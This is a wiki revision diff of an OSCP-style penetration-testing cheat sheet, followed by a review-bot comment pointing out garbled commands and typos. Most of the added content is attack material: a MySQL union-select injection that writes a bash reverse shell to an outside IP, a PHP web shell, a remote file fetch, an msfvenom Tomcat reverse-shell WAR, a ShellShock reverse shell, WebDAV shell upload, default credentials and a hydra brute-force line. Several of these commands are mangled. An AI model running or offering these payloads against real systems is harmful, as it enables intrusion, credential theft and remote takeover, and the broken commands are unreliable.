oscp_survival_guide

Differences

This page shows the differences between the selected revision and the current version of the page.


oscp_survival_guide [2020/11/25 14:16]
M0N5T3R
oscp_survival_guide [2020/11/25 14:39] (current version)
M0N5T3R
Line 2754: Line 2754:
 https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
  
 +RealVNC
 +RealVNC : https://www.exploit-db.com/exploits/36932
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444
 +root@kali:~/PWK$python RealVNC-exploit-36932.py
 +[] Please input an IP address to pwn: 10.11.1.227
 +[] Hello From Server: RFB 003.008
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
 +
 +
 +XAMPP
 +XAMPP cred(wampp/xampp)
          
 +
 +ColdFusion (Vulnerable)
 +Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
 +LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 +(either – neo-security.xml and password.properties)
 +ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 +exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +
 +Webdav
 +WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
 +auxiliary : webdav_test
 +1 cadaver http://10.11.x.x/webdav/
 +Uploading shells.txt to `shells.txt’
 +1 dav:> put shells.txt
 +2 dav:> copy shells.txt shells.asp;.txt
 +
 +PHPAdmin 
 +http://.../phpmyadmin
 +db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 +You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +
 +Tomcat 
 +Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html
 +You can upload reverse shell on manager consor ; msfvenom jsp or war file
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
 +jar -xvf shell.war
 +
 +
 +Windows IIS 
 +Getting Windows 0S and version details through Nikto / Nmap Scanning.
 +auxiliary/admin/http/iis_auth_bypass
 +
 +mysql
 +nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
 +MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
 +MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
 +UPLOAD A FILE :
 +' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
 +OPEN A PHP SHELL :
 +' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +
 +
 +ShellShock
 +nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 +root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
 +[!] Started reverse shell handler
 +[-] Trying exploit on : /cgi-bin/status"
 +
 +Squid 
 +proxy scanner/http/squid_pivot_scanning
 +RHOST : Target
 +RANGE : Target
 +RPORT : Squid port
 +msf auxiliary(scanner/http/squid_pivot_scanning) > run
 +[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
 +[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
 +if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 +nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 +
 +RFI(Remote File Inclusion) 
 +browse.php?file=http://10.11.0.42/index.html
 +browse.php?file=ftp://10.11.0.42/index.html
 +browse.php?expect://ls
 +
 +Uploading malicious .php file on database 
 +http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 +
 </code> </code>
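Review bot: several commands in this hunk have been mangled by the wiki's typographic conversion or by a copy from a spreadsheet/listing and will not work as pasted, so they should be re-entered from a plain-text source. In the ColdFusion entry the traversal segments of the `enter.cfm?locale=` URL have become ellipsis characters (`…/`) and the locale suffix has fused onto the file name (`password.propertiesen`); in the mysql entry the nmap line uses an en dash (`–script=`) where `--script=` is needed; the ShellShock and Squid entries carry a stray trailing quote (`/cgi-bin/status"` and `3128"`); and the three `union select` payloads show doubled quotes (`""<?php`, `\""`) that look like CSV export escaping rather than the quoting the text means. The Webdav entry has leaked listing numbers (`1 cadaver http://10.11.x.x/webdav/`, `1 dav:> put shells.txt`, `2 dav:> copy shells.txt shells.asp;.txt`), and the hydra and mysql login lines carry a stray `sh` prefix. Typos to fix: `passowrd`, `0S` for OS, `consor` for console, `browsereg.` for "browser, e.g.", and the `PHPAdmin` heading where the path below is `/phpmyadmin`. Documentation-wise, the ColdFusion entry identifies CVE-2010-2861 only through the gnucitizen URL and the XAMPP, Tomcat and phpMyAdmin entries list default credentials without saying which version or install they were observed on; naming the CVE in the text and adding the version checked next to each default-credential note would make the section usable as a reference rather than a scratchpad.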
oscp_survival_guide.txt · Last modified: 2020/11/25 14:39 by M0N5T3R